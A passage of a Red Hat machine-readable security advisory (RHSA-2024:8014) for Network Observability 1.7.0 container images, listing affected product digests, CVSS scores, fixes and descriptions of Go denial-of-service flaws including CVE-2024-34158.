"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion"
},
{
"cve": "CVE-2024-34158",
"cwe": {
"id": "CWE-1325",
"name": "Improperly Controlled Sequential Memory Allocation"
},
"discovery_date": "2024-09-06T21:20:12.126400+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310529"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the go/build/constraint package of the Golang standard library. Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "go/build/constraint: golang: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Within regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-1325: Improperly Controlled Sequential Memory Allocation vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nAccess to the platform is granted only after successful hard token-based multi-factor authentication (MFA) and is governed by least privilege to ensure only authorized users and roles can execute or modify code. Static code analysis and peer reviews enforce strong input validation and error handling, preventing improperly validated inputs from causing system instability, data exposure, or privilege escalation. In the event of successful exploitation, process isolation limits the impact of excessive sequential memory allocation by restricting memory use per process, preventing any single process from exhausting system resources. Finally, the platform uses memory protection mechanisms such as Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR) to reduce the risk of memory allocation-based attacks.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-34158"
},
{
"category": "external",
"summary": "RHBZ#2310529",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310529"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-34158",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34158"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-34158",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34158"
},
{
"category": "external",
"summary": "https://go.dev/cl/611240",
"url": "https://go.dev/cl/611240"
},
{
"category": "external",
"summary": "https://go.dev/issue/69141",
"url": "https://go.dev/issue/69141"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk",
"url": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2024-3107",
"url": "https://pkg.go.dev/vuln/GO-2024-3107"
}
],
"release_date": "2024-09-06T21:15:12.083000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
